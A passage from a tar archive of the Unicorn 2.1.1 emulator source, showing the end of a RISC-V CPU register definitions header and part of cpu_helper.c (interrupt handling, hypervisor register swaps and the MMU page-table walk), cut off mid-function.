0xb83 #define CSR_MHPMCOUNTER4H 0xb84 #define CSR_MHPMCOUNTER5H 0xb85 #define CSR_MHPMCOUNTER6H 0xb86 #define CSR_MHPMCOUNTER7H 0xb87 #define CSR_MHPMCOUNTER8H 0xb88 #define CSR_MHPMCOUNTER9H 0xb89 #define CSR_MHPMCOUNTER10H 0xb8a #define CSR_MHPMCOUNTER11H 0xb8b #define CSR_MHPMCOUNTER12H 0xb8c #define CSR_MHPMCOUNTER13H 0xb8d #define CSR_MHPMCOUNTER14H 0xb8e #define CSR_MHPMCOUNTER15H 0xb8f #define CSR_MHPMCOUNTER16H 0xb90 #define CSR_MHPMCOUNTER17H 0xb91 #define CSR_MHPMCOUNTER18H 0xb92 #define CSR_MHPMCOUNTER19H 0xb93 #define CSR_MHPMCOUNTER20H 0xb94 #define CSR_MHPMCOUNTER21H 0xb95 #define CSR_MHPMCOUNTER22H 0xb96 #define CSR_MHPMCOUNTER23H 0xb97 #define CSR_MHPMCOUNTER24H 0xb98 #define CSR_MHPMCOUNTER25H 0xb99 #define CSR_MHPMCOUNTER26H 0xb9a #define CSR_MHPMCOUNTER27H 0xb9b #define CSR_MHPMCOUNTER28H 0xb9c #define CSR_MHPMCOUNTER29H 0xb9d #define CSR_MHPMCOUNTER30H 0xb9e #define CSR_MHPMCOUNTER31H 0xb9f /* Legacy Machine Protection and Translation (priv v1.9.1) */ #define CSR_MBASE 0x380 #define CSR_MBOUND 0x381 #define CSR_MIBASE 0x382 #define CSR_MIBOUND 0x383 #define CSR_MDBASE 0x384 #define CSR_MDBOUND 0x385 /* mstatus CSR bits */ #define MSTATUS_UIE 0x00000001 #define MSTATUS_SIE 0x00000002 #define MSTATUS_MIE 0x00000008 #define MSTATUS_UPIE 0x00000010 #define MSTATUS_SPIE 0x00000020 #define MSTATUS_MPIE 0x00000080 #define MSTATUS_SPP 0x00000100 #define MSTATUS_MPP 0x00001800 #define MSTATUS_FS 0x00006000 #define MSTATUS_XS 0x00018000 #define MSTATUS_MPRV 0x00020000 #define MSTATUS_PUM 0x00040000 /* until: priv-1.9.1 */ #define MSTATUS_SUM 0x00040000 /* since: priv-1.10 */ #define MSTATUS_MXR 0x00080000 #define MSTATUS_VM 0x1F000000 /* until: priv-1.9.1 */ #define MSTATUS_TVM 0x00100000 /* since: priv-1.10 */ #define MSTATUS_TW 0x20000000 /* since: priv-1.10 */ #define MSTATUS_TSR 0x40000000 /* since: priv-1.10 */ #if defined(TARGET_RISCV64) #define MSTATUS_MTL 0x4000000000ULL #define MSTATUS_MPV 0x8000000000ULL #elif defined(TARGET_RISCV32) #define MSTATUS_MTL 0x00000040 #define MSTATUS_MPV 0x00000080 #endif #ifdef TARGET_RISCV32 # define MSTATUS_MPV_ISSET(env) get_field(env->mstatush, MSTATUS_MPV) #else # define MSTATUS_MPV_ISSET(env) get_field(env->mstatus, MSTATUS_MPV) #endif #define MSTATUS64_UXL 0x0000000300000000ULL #define MSTATUS64_SXL 0x0000000C00000000ULL #define MSTATUS32_SD 0x80000000 #define MSTATUS64_SD 0x8000000000000000ULL #define MISA32_MXL 0xC0000000 #define MISA64_MXL 0xC000000000000000ULL #define MXL_RV32 1 #define MXL_RV64 2 #define MXL_RV128 3 #if defined(TARGET_RISCV32) #define MSTATUS_SD MSTATUS32_SD #define MISA_MXL MISA32_MXL #define MXL_VAL MXL_RV32 #elif defined(TARGET_RISCV64) #define MSTATUS_SD MSTATUS64_SD #define MISA_MXL MISA64_MXL #define MXL_VAL MXL_RV64 #endif /* sstatus CSR bits */ #define SSTATUS_UIE 0x00000001 #define SSTATUS_SIE 0x00000002 #define SSTATUS_UPIE 0x00000010 #define SSTATUS_SPIE 0x00000020 #define SSTATUS_SPP 0x00000100 #define SSTATUS_FS 0x00006000 #define SSTATUS_XS 0x00018000 #define SSTATUS_PUM 0x00040000 /* until: priv-1.9.1 */ #define SSTATUS_SUM 0x00040000 /* since: priv-1.10 */ #define SSTATUS_MXR 0x00080000 #define SSTATUS32_SD 0x80000000 #define SSTATUS64_SD 0x8000000000000000ULL #if defined(TARGET_RISCV32) #define SSTATUS_SD SSTATUS32_SD #elif defined(TARGET_RISCV64) #define SSTATUS_SD SSTATUS64_SD #endif /* hstatus CSR bits */ #define HSTATUS_SPRV 0x00000001 #define HSTATUS_SPV 0x00000080 #define HSTATUS_SP2P 0x00000100 #define HSTATUS_SP2V 0x00000200 #define HSTATUS_VTVM 0x00100000 #define HSTATUS_VTW 0x00200000 #define HSTATUS_VTSR 0x00400000 #define HSTATUS32_WPRI 0xFF8FF87E #define HSTATUS64_WPRI 0xFFFFFFFFFF8FF87EULL #if defined(TARGET_RISCV32) #define HSTATUS_WPRI HSTATUS32_WPRI #elif defined(TARGET_RISCV64) #define HSTATUS_WPRI HSTATUS64_WPRI #endif /* Privilege modes */ #define PRV_U 0 #define PRV_S 1 #define PRV_H 2 /* Reserved */ #define PRV_M 3 /* Virtulisation Register Fields */ #define VIRT_ONOFF 1 /* This is used to save state for when we take an exception. If this is set * that means that we want to force a HS level exception (no matter what the * delegation is set to). This will occur for things such as a second level * page table fault. */ #define FORCE_HS_EXCEP 2 /* RV32 satp CSR field masks */ #define SATP32_MODE 0x80000000 #define SATP32_ASID 0x7fc00000 #define SATP32_PPN 0x003fffff /* RV64 satp CSR field masks */ #define SATP64_MODE 0xF000000000000000ULL #define SATP64_ASID 0x0FFFF00000000000ULL #define SATP64_PPN 0x00000FFFFFFFFFFFULL #if defined(TARGET_RISCV32) #define SATP_MODE SATP32_MODE #define SATP_ASID SATP32_ASID #define SATP_PPN SATP32_PPN #endif #if defined(TARGET_RISCV64) #define SATP_MODE SATP64_MODE #define SATP_ASID SATP64_ASID #define SATP_PPN SATP64_PPN #endif /* VM modes (mstatus.vm) privileged ISA 1.9.1 */ #define VM_1_09_MBARE 0 #define VM_1_09_MBB 1 #define VM_1_09_MBBID 2 #define VM_1_09_SV32 8 #define VM_1_09_SV39 9 #define VM_1_09_SV48 10 /* VM modes (satp.mode) privileged ISA 1.10 */ #define VM_1_10_MBARE 0 #define VM_1_10_SV32 1 #define VM_1_10_SV39 8 #define VM_1_10_SV48 9 #define VM_1_10_SV57 10 #define VM_1_10_SV64 11 /* Page table entry (PTE) fields */ #define PTE_V 0x001 /* Valid */ #define PTE_R 0x002 /* Read */ #define PTE_W 0x004 /* Write */ #define PTE_X 0x008 /* Execute */ #define PTE_U 0x010 /* User */ #define PTE_G 0x020 /* Global */ #define PTE_A 0x040 /* Accessed */ #define PTE_D 0x080 /* Dirty */ #define PTE_SOFT 0x300 /* Reserved for Software */ /* Page table PPN shift amount */ #define PTE_PPN_SHIFT 10 /* Leaf page shift amount */ #define PGSHIFT 12 /* Default Reset Vector adress */ #define DEFAULT_RSTVEC 0x1000 /* Exception causes */ #define EXCP_NONE -1 /* sentinel value */ #define RISCV_EXCP_INST_ADDR_MIS 0x0 #define RISCV_EXCP_INST_ACCESS_FAULT 0x1 #define RISCV_EXCP_ILLEGAL_INST 0x2 #define RISCV_EXCP_BREAKPOINT 0x3 #define RISCV_EXCP_LOAD_ADDR_MIS 0x4 #define RISCV_EXCP_LOAD_ACCESS_FAULT 0x5 #define RISCV_EXCP_STORE_AMO_ADDR_MIS 0x6 #define RISCV_EXCP_STORE_AMO_ACCESS_FAULT 0x7 #define RISCV_EXCP_U_ECALL 0x8 #define RISCV_EXCP_S_ECALL 0x9 #define RISCV_EXCP_VS_ECALL 0xa #define RISCV_EXCP_M_ECALL 0xb #define RISCV_EXCP_INST_PAGE_FAULT 0xc /* since: priv-1.10.0 */ #define RISCV_EXCP_LOAD_PAGE_FAULT 0xd /* since: priv-1.10.0 */ #define RISCV_EXCP_STORE_PAGE_FAULT 0xf /* since: priv-1.10.0 */ #define RISCV_EXCP_INST_GUEST_PAGE_FAULT 0x14 #define RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT 0x15 #define RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT 0x17 #define RISCV_EXCP_UNICORN_END 0x8888 #define RISCV_EXCP_INT_FLAG 0x80000000 #define RISCV_EXCP_INT_MASK 0x7fffffff /* Interrupt causes */ #define IRQ_U_SOFT 0 #define IRQ_S_SOFT 1 #define IRQ_VS_SOFT 2 #define IRQ_M_SOFT 3 #define IRQ_U_TIMER 4 #define IRQ_S_TIMER 5 #define IRQ_VS_TIMER 6 #define IRQ_M_TIMER 7 #define IRQ_U_EXT 8 #define IRQ_S_EXT 9 #define IRQ_VS_EXT 10 #define IRQ_M_EXT 11 /* mip masks */ #define MIP_USIP (1 << IRQ_U_SOFT) #define MIP_SSIP (1 << IRQ_S_SOFT) #define MIP_VSSIP (1 << IRQ_VS_SOFT) #define MIP_MSIP (1 << IRQ_M_SOFT) #define MIP_UTIP (1 << IRQ_U_TIMER) #define MIP_STIP (1 << IRQ_S_TIMER) #define MIP_VSTIP (1 << IRQ_VS_TIMER) #define MIP_MTIP (1 << IRQ_M_TIMER) #define MIP_UEIP (1 << IRQ_U_EXT) #define MIP_SEIP (1 << IRQ_S_EXT) #define MIP_VSEIP (1 << IRQ_VS_EXT) #define MIP_MEIP (1 << IRQ_M_EXT) /* sip masks */ #define SIP_SSIP MIP_SSIP #define SIP_STIP MIP_STIP #define SIP_SEIP MIP_SEIP /* MIE masks */ #define MIE_SEIE (1 << IRQ_S_EXT) #define MIE_UEIE (1 << IRQ_U_EXT) #define MIE_STIE (1 << IRQ_S_TIMER) #define MIE_UTIE (1 << IRQ_U_TIMER) #define MIE_SSIE (1 << IRQ_S_SOFT) #define MIE_USIE (1 << IRQ_U_SOFT) #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000102506�14675241067�0021065�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V CPU helpers for qemu. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" int riscv_cpu_mmu_index(CPURISCVState *env, bool ifetch) { return env->priv; } static int riscv_cpu_local_irq_pending(CPURISCVState *env) { target_ulong irqs; target_ulong mstatus_mie = get_field(env->mstatus, MSTATUS_MIE); target_ulong mstatus_sie = get_field(env->mstatus, MSTATUS_SIE); target_ulong hs_mstatus_sie = get_field(env->mstatus_hs, MSTATUS_SIE); target_ulong pending = env->mip & env->mie & ~(MIP_VSSIP | MIP_VSTIP | MIP_VSEIP); target_ulong vspending = (env->mip & env->mie & (MIP_VSSIP | MIP_VSTIP | MIP_VSEIP)); target_ulong mie = env->priv < PRV_M || (env->priv == PRV_M && mstatus_mie); target_ulong sie = env->priv < PRV_S || (env->priv == PRV_S && mstatus_sie); target_ulong hs_sie = env->priv < PRV_S || (env->priv == PRV_S && hs_mstatus_sie); if (riscv_cpu_virt_enabled(env)) { #ifdef _MSC_VER target_ulong pending_hs_irq = pending & (0 - hs_sie); #else target_ulong pending_hs_irq = pending & -hs_sie; #endif if (pending_hs_irq) { riscv_cpu_set_force_hs_excep(env, FORCE_HS_EXCEP); return ctz64(pending_hs_irq); } pending = vspending; } #ifdef _MSC_VER irqs = (pending & ~env->mideleg & (0 - mie)) | (pending & env->mideleg & (0 - sie)); #else irqs = (pending & ~env->mideleg & -mie) | (pending & env->mideleg & -sie); #endif if (irqs) { return ctz64(irqs); /* since non-zero */ } else { return EXCP_NONE; /* indicates no pending interrupt */ } } bool riscv_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; int interruptno = riscv_cpu_local_irq_pending(env); if (interruptno >= 0) { cs->exception_index = RISCV_EXCP_INT_FLAG | interruptno; riscv_cpu_do_interrupt(cs); return true; } } return false; } /* Return true is floating point support is currently enabled */ bool riscv_cpu_fp_enabled(CPURISCVState *env) { if (env->mstatus & MSTATUS_FS) { if (riscv_cpu_virt_enabled(env) && !(env->mstatus_hs & MSTATUS_FS)) { return false; } return true; } return false; } void riscv_cpu_swap_hypervisor_regs(CPURISCVState *env) { target_ulong mstatus_mask = MSTATUS_MXR | MSTATUS_SUM | MSTATUS_FS | MSTATUS_SPP | MSTATUS_SPIE | MSTATUS_SIE; bool current_virt = riscv_cpu_virt_enabled(env); g_assert(riscv_has_ext(env, RVH)); #if defined(TARGET_RISCV64) mstatus_mask |= MSTATUS64_UXL; #endif if (current_virt) { /* Current V=1 and we are about to change to V=0 */ env->vsstatus = env->mstatus & mstatus_mask; env->mstatus &= ~mstatus_mask; env->mstatus |= env->mstatus_hs; #if defined(TARGET_RISCV32) env->vsstatush = env->mstatush; env->mstatush |= env->mstatush_hs; #endif env->vstvec = env->stvec; env->stvec = env->stvec_hs; env->vsscratch = env->sscratch; env->sscratch = env->sscratch_hs; env->vsepc = env->sepc; env->sepc = env->sepc_hs; env->vscause = env->scause; env->scause = env->scause_hs; env->vstval = env->sbadaddr; env->sbadaddr = env->stval_hs; env->vsatp = env->satp; env->satp = env->satp_hs; } else { /* Current V=0 and we are about to change to V=1 */ env->mstatus_hs = env->mstatus & mstatus_mask; env->mstatus &= ~mstatus_mask; env->mstatus |= env->vsstatus; #if defined(TARGET_RISCV32) env->mstatush_hs = env->mstatush; env->mstatush |= env->vsstatush; #endif env->stvec_hs = env->stvec; env->stvec = env->vstvec; env->sscratch_hs = env->sscratch; env->sscratch = env->vsscratch; env->sepc_hs = env->sepc; env->sepc = env->vsepc; env->scause_hs = env->scause; env->scause = env->vscause; env->stval_hs = env->sbadaddr; env->sbadaddr = env->vstval; env->satp_hs = env->satp; env->satp = env->vsatp; } } bool riscv_cpu_virt_enabled(CPURISCVState *env) { if (!riscv_has_ext(env, RVH)) { return false; } return get_field(env->virt, VIRT_ONOFF); } void riscv_cpu_set_virt_enabled(CPURISCVState *env, bool enable) { if (!riscv_has_ext(env, RVH)) { return; } /* Flush the TLB on all virt mode changes. */ if (get_field(env->virt, VIRT_ONOFF) != enable) { tlb_flush(env_cpu(env)); } env->virt = set_field(env->virt, VIRT_ONOFF, enable); } bool riscv_cpu_force_hs_excep_enabled(CPURISCVState *env) { if (!riscv_has_ext(env, RVH)) { return false; } return get_field(env->virt, FORCE_HS_EXCEP); } void riscv_cpu_set_force_hs_excep(CPURISCVState *env, bool enable) { if (!riscv_has_ext(env, RVH)) { return; } env->virt = set_field(env->virt, FORCE_HS_EXCEP, enable); } int riscv_cpu_claim_interrupts(RISCVCPU *cpu, uint32_t interrupts) { CPURISCVState *env = &cpu->env; if (env->miclaim & interrupts) { return -1; } else { env->miclaim |= interrupts; return 0; } } uint32_t riscv_cpu_update_mip(RISCVCPU *cpu, uint32_t mask, uint32_t value) { CPURISCVState *env = &cpu->env; CPUState *cs = CPU(cpu); uint32_t old = env->mip; env->mip = (env->mip & ~mask) | (value & mask); if (env->mip) { cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } return old; } void riscv_cpu_set_rdtime_fn(CPURISCVState *env, uint64_t (*fn)(void)) { env->rdtime_fn = fn; } void riscv_cpu_set_mode(CPURISCVState *env, target_ulong newpriv) { if (newpriv > PRV_M) { g_assert_not_reached(); } if (newpriv == PRV_H) { newpriv = PRV_U; } /* tlb_flush is unnecessary as mode is contained in mmu_idx */ env->priv = newpriv; /* * Clear the load reservation - otherwise a reservation placed in one * context/process can be used by another, resulting in an SC succeeding * incorrectly. Version 2.2 of the ISA specification explicitly requires * this behaviour, while later revisions say that the kernel "should" use * an SC instruction to force the yielding of a load reservation on a * preemptive context switch. As a result, do both. */ env->load_res = -1; } /* get_physical_address - get the physical address for this virtual address * * Do a page table walk to obtain the physical address corresponding to a * virtual address. Returns 0 if the translation was successful * * Adapted from Spike's mmu_t::translate and mmu_t::walk * * @env: CPURISCVState * @physical: This will be set to the calculated physical address * @prot: The returned protection attributes * @addr: The virtual address to be translated * @access_type: The type of MMU access * @mmu_idx: Indicates current privilege level * @first_stage: Are we in first stage translation? * Second stage is used for hypervisor guest translation * @two_stage: Are we going to perform two stage translation */ static int get_physical_address(CPURISCVState *env, hwaddr *physical, int *prot, target_ulong addr, int access_type, int mmu_idx, bool first_stage, bool two_stage) { /* NOTE: the env->pc value visible here will not be * correct, but the value visible to the exception handler * (riscv_cpu_do_interrupt) is correct */ MemTxResult res; MemTxAttrs attrs = MEMTXATTRS_UNSPECIFIED; int mode = mmu_idx; bool use_background = false; hwaddr base; int levels = 0, ptidxbits = 0, ptesize = 0, vm, sum, mxr, widened; /* * Check if we should use the background registers for the two * stage translation. We don't need to check if we actually need * two stage translation as that happened before this function * was called. Background registers will be used if the guest has * forced a two stage translation to be on (in HS or M mode). */ if (mode == PRV_M && access_type != MMU_INST_FETCH) { if (get_field(env->mstatus, MSTATUS_MPRV)) { mode = get_field(env->mstatus, MSTATUS_MPP); if (riscv_has_ext(env, RVH) && MSTATUS_MPV_ISSET(env)) { use_background = true; } } } if (mode == PRV_S && access_type != MMU_INST_FETCH && riscv_has_ext(env, RVH) && !riscv_cpu_virt_enabled(env)) { if (get_field(env->hstatus, HSTATUS_SPRV)) { mode = get_field(env->mstatus, SSTATUS_SPP); use_background = true; } } if (first_stage == false) { /* We are in stage 2 translation, this is similar to stage 1. */ /* Stage 2 is always taken as U-mode */ mode = PRV_U; } if (mode == PRV_M || !riscv_feature(env, RISCV_FEATURE_MMU)) { *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; } *prot = 0; if (first_stage == true) { mxr = get_field(env->mstatus, MSTATUS_MXR); } else { mxr = get_field(env->vsstatus, MSTATUS_MXR); } if (env->priv_ver >= PRIV_VERSION_1_10_0) { if (first_stage == true) { if (use_background) { base = (hwaddr)get_field(env->vsatp, SATP_PPN) << PGSHIFT; vm = get_field(env->vsatp, SATP_MODE); } else { base = (hwaddr)get_field(env->satp, SATP_PPN) << PGSHIFT; vm = get_field(env->satp, SATP_MODE); } widened = 0; } else { base = (hwaddr)get_field(env->hgatp, HGATP_PPN) << PGSHIFT; vm = get_field(env->hgatp, HGATP_MODE); widened = 2; } sum = get_field(env->mstatus, MSTATUS_SUM); switch (vm) { case VM_1_10_SV32: levels = 2; ptidxbits = 10; ptesize = 4; break; case VM_1_10_SV39: levels = 3; ptidxbits = 9; ptesize = 8; break; case VM_1_10_SV48: levels = 4; ptidxbits = 9; ptesize = 8; break; case VM_1_10_SV57: levels = 5; ptidxbits = 9; ptesize = 8; break; case VM_1_10_MBARE: *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; default: g_assert_not_reached(); } } else { widened = 0; base = (hwaddr)(env->sptbr) << PGSHIFT; sum = !get_field(env->mstatus, MSTATUS_PUM); vm = get_field(env->mstatus, MSTATUS_VM); switch (vm) { case VM_1_09_SV32: levels = 2; ptidxbits = 10; ptesize = 4; break; case VM_1_09_SV39: levels = 3; ptidxbits = 9; ptesize = 8; break; case VM_1_09_SV48: levels = 4; ptidxbits = 9; ptesize = 8; break; case VM_1_09_MBARE: *physical = addr; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TRANSLATE_SUCCESS; default: g_assert_not_reached(); } } CPUState *cs = env_cpu(env); int va_bits = PGSHIFT + levels * ptidxbits + widened; target_ulong mask, masked_msbs; if (TARGET_LONG_BITS > (va_bits - 1)) { mask = (1L << (TARGET_LONG_BITS - (va_bits - 1))) - 1; } else { mask = 0; } masked_msbs = (addr >> (va_bits - 1)) & mask; if (masked_msbs != 0 && masked_msbs != mask) { return TRANSLATE_FAIL; } int ptshift = (levels - 1) * ptidxbits; int i; #if !TCG_OVERSIZED_GUEST restart: #endif for (i = 0; i < levels; i++, ptshift -= ptidxbits) { target_ulong idx; if (i == 0) { idx = (addr >> (PGSHIFT + ptshift)) & ((1 << (ptidxbits + widened)) - 1); } else { idx = (addr >> (PGSHIFT + ptshift)) & ((1 << ptidxbits) - 1); } /* check that physical address of PTE is legal */ hwaddr pte_addr; if (two_stage && first_stage) { hwaddr vbase; /* Do the second stage translation on the base PTE address. */ get_physical_address(env, &vbase, prot, base, access_type, mmu_idx, false, true); pte_addr = vbase + idx * ptesize; } else { pte_addr = base + idx * ptesize; } if (riscv_feature(env, RISCV_FEATURE_PMP) && !pmp_hart_has_privs(env, pte_addr, sizeof(target_ulong), 1 << MMU_DATA_LOAD, PRV_S)) { return TRANSLATE_PMP_FAIL; } #if defined(TARGET_RISCV32) #ifdef UNICORN_ARCH_POSTFIX target_ulong pte = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pte_addr, attrs, &res); #else target_ulong pte = address_space_ldl(cs->as->uc, cs->as, pte_addr, attrs, &res); #endif #elif defined(TARGET_RISCV64) #ifdef UNICORN_ARCH_POSTFIX target_ulong pte = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pte_addr, attrs, &res); #else target_ulong pte = address_space_ldq(cs->as->uc, cs->as, pte_addr, attrs, &res); #endif #endif if (res != MEMTX_OK) { return TRANSLATE_FAIL; } hwaddr ppn = pte >> PTE_PPN_SHIFT; if (!(pte & PTE_V)) { /* Invalid PTE */ return TRANSLATE_FAIL; } else if (!(pte & (PTE_R | PTE_W | PTE_X))) { /* Inner PTE, continue walking */ base = ppn << PGSHIFT; } else if ((pte & (PTE_R | PTE_W | PTE_X)) == PTE_W) { /* Reserved leaf PTE flags: PTE_W */ return TRANSLATE_FAIL; } else if ((pte & (PTE_R | PTE_W | PTE_X)) == (PTE_W | PTE_X)) { /* Reserved leaf PTE flags: PTE_W + PTE_X */ return TRANSLATE_FAIL; } else if ((pte & PTE_U) && ((mode != PRV_U) && (!sum || access_type == MMU_INST_FETCH))) { /* User PTE flags when not U mode and mstatus.SUM is not set, or the access type is an instruction fetch */ return TRANSLATE_FAIL; } else if (!(pte & PTE_U) && (mode != PRV_S)) { /* Supervisor PTE flags when not S mode */ return TRANSLATE_FAIL; } else if (ppn & ((1ULL << ptshift) - 1)) { /* Misaligned PPN */ return TRANSLATE_FAIL; } else if (access_type == MMU_DATA_LOAD && !((pte & PTE_R) || ((pte & PTE_X) && mxr))) { /* Read access check failed */ return TRANSLATE_FAIL; } else if (access_type == MMU_DATA_STORE && !(pte & PTE_W)) { /* Write access check failed */ return TRANSLATE_FAIL; } else if (access_type == MMU_INST_FETCH && !(pte & PTE_X)) { /* Fetch access check failed */ return TRANSLATE_FAIL; } else { /* if necessary, set accessed and dirty bits. */ target_ulong updated_pte = pte | PTE_A | (access_type == MMU_DATA_STORE ? PTE_D : 0); /* Page table updates need to be atomic with MTTCG enabled */ if (updated_pte != pte) { /* * - if accessed or dirty bits need updating, and the PTE is * in RAM, then we do so atomically with a compare and swap. * - if the PTE is in IO space or ROM, then it can't be updated * and we return TRANSLATE_FAIL. * - if the PTE changed by the time we went to update it, then * it is no longer valid and we must re-walk the page table. */ MemoryRegion *mr; hwaddr l = sizeof(target_ulong), addr1; mr = address_space_translate(cs->as, pte_addr, &addr1, &l, false, MEMTXATTRS_UNSPECIFIED); if (memory_region_is_ram(mr)) { target_ulong *pte_pa = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); #if TCG_OVERSIZED_GUEST /* MTTCG is not enabled on oversized TCG guests so * page table updates do not need to be atomic */ *pte_pa = pte = updated_pte; #else target_ulong old_pte = #ifdef _MSC_VER atomic_cmpxchg((long *)pte_pa, pte, updated_pte); #else atomic_cmpxchg(pte_pa, pte, updated_pte); #endif if (old_pte != pte) { goto restart; } else { pte = updated_pte; } #endif } else { /* misconfigured PTE in ROM (AD bits are not preset) or * PTE is in IO space and can't be updated atomically */ return TRANSLATE_FAIL; } } /* for superpage mappings, make a fake leaf PTE for the TLB's benefit. */ target_ulong vpn = addr >> PGSHIFT; if (i == 0) { *physical = (ppn | (vpn & ((1L << (ptshift + widened)) - 1))) << PGSHIFT; } else { *physical = (ppn | (vpn & ((1L << ptshift) - 1))) << PGSHIFT; } /* set permissions on the TLB entry */ if ((pte & PTE_R) || ((pte & PTE_X) && mxr)) { *prot |= PAGE_READ; } if ((pte & PTE_X)) { *prot |= PAGE_EXEC; } /* add write permission on stores or if the page is already dirty, so that we TLB miss on later writes to update the dirty bit */ if ((pte & PTE_W) && (access_type == MMU_DATA_STORE || (pte & PTE_D))) { *prot |= PAGE_WRITE; } return TRANSLATE_SUCCESS; } } return TRANSLATE_FAIL; } static void raise_mmu_exception(CPURISCVState *env, target_ulong address, MMUAccessType access_type, bool pmp_violation, bool first_stage) { CPUState *cs = env_cpu(env); int page_fault_exceptions; if (first_stage) { page_fault_exceptions = (env->priv_ver >= PRIV_VERSION_1_10_0) && get_field(env->satp, SATP_MODE) != VM_1_10_MBARE && !pmp_violation; } else { page_fault_exceptions = get_field(env->hgatp, HGATP_MODE) != VM_1_10_MBARE && !pmp_violation; } switch (access_type) { case MMU_INST_FETCH: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_INST_GUEST_PAGE_FAULT; } else { cs->exception_index = page_fault_exceptions ? RISCV_EXCP_INST_PAGE_FAULT : RISCV_EXCP_INST_ACCESS_FAULT; } break; case MMU_DATA_LOAD: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT; } else { cs->exception_index = page_fault_exceptions ? RISCV_EXCP_LOAD_PAGE_FAULT : RISCV_EXCP_LOAD_ACCESS_FAULT; } break; case MMU_DATA_STORE: if (riscv_cpu_virt_enabled(env) && !first_stage) { cs->exception_index = RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT; } else { cs->exception_index = page_fault_exceptions ? RISCV_EXCP_STORE_PAGE_FAULT : RISCV_EXCP_STORE_AMO_ACCESS_FAULT; } break; default: g_assert_not_reached(); } env->badaddr = address; } hwaddr riscv_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; hwaddr phys_addr; int prot; int mmu_idx = cpu_mmu_index(&cpu->env, false); if (get_physical_address(env, &phys_addr, &prot, addr, 0, mmu_idx, true, riscv_cpu_virt_enabled(env))) { return -1; } if (riscv_cpu_virt_enabled(env)) { if (get_physical_address(env, &phys_addr, &prot, phys_addr, 0, mmu_idx, false, true)) { return -1; } } return phys_addr; } void riscv_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; if (access_type == MMU_DATA_STORE) { cs->exception_index = RISCV_EXCP_STORE_AMO_ACCESS_FAULT; } else { cs->exception_index = RISCV_EXCP_LOAD_ACCESS_FAULT; } env->badaddr = addr; riscv_raise_exception(&cpu->env, cs->exception_index, retaddr); } void riscv_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; switch (access_type) { case MMU_INST_FETCH: cs->exception_index = RISCV_EXCP_INST_ADDR_MIS; break; case MMU_DATA_LOAD: cs->exception_index = RISCV_EXCP_LOAD_ADDR_MIS; break; case MMU_DATA_STORE: cs->exception_index = RISCV_EXCP_STORE_AMO_ADDR_MIS; break; default: g_assert_not_reached(); } env->badaddr = addr; riscv_raise_exception(env, cs->exception_index, retaddr); } bool riscv_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; vaddr im_address; hwaddr pa = 0; int prot; bool pmp_violation = false; bool m_mode_two_stage = false; bool hs_mode_two_stage = false; bool first_stage_error = true; int ret = TRANSLATE_FAIL; int mode = mmu_idx; env->guest_phys_fault_addr = 0; qemu_log_mask(CPU_LOG_MMU, "%s ad %" VADDR_PRIx " rw %d mmu_idx %d\n", __func__, address, access_type, mmu_idx); /* * Determine if we are in M mode and MPRV is set or in HS mode and SPRV is * set and we want to access a virtulisation address. */ if (riscv_has_ext(env, RVH)) { m_mode_two_stage = env->priv == PRV_M && access_type != MMU_INST_FETCH && get_field(env->mstatus, MSTATUS_MPRV) && MSTATUS_MPV_ISSET(env); hs_mode_two_stage = env->priv == PRV_S && !riscv_cpu_virt_enabled(env) && access_type != MMU_INST_FETCH && get_field(env->hstatus, HSTATUS_SPRV) && get_field(env->hstatus, HSTATUS_SPV); } if (mode == PRV_M && access_type != MMU_INST_FETCH) { if (get_field(env->mstatus, MSTATUS_MPRV)) { mode = get_field(env->mstatus, MSTATUS_MPP); } } if (riscv_cpu_virt_enabled(env) || m_mode_two_stage || hs_mode_two_stage) { /* Two stage lookup */ ret = get_physical_address(env, 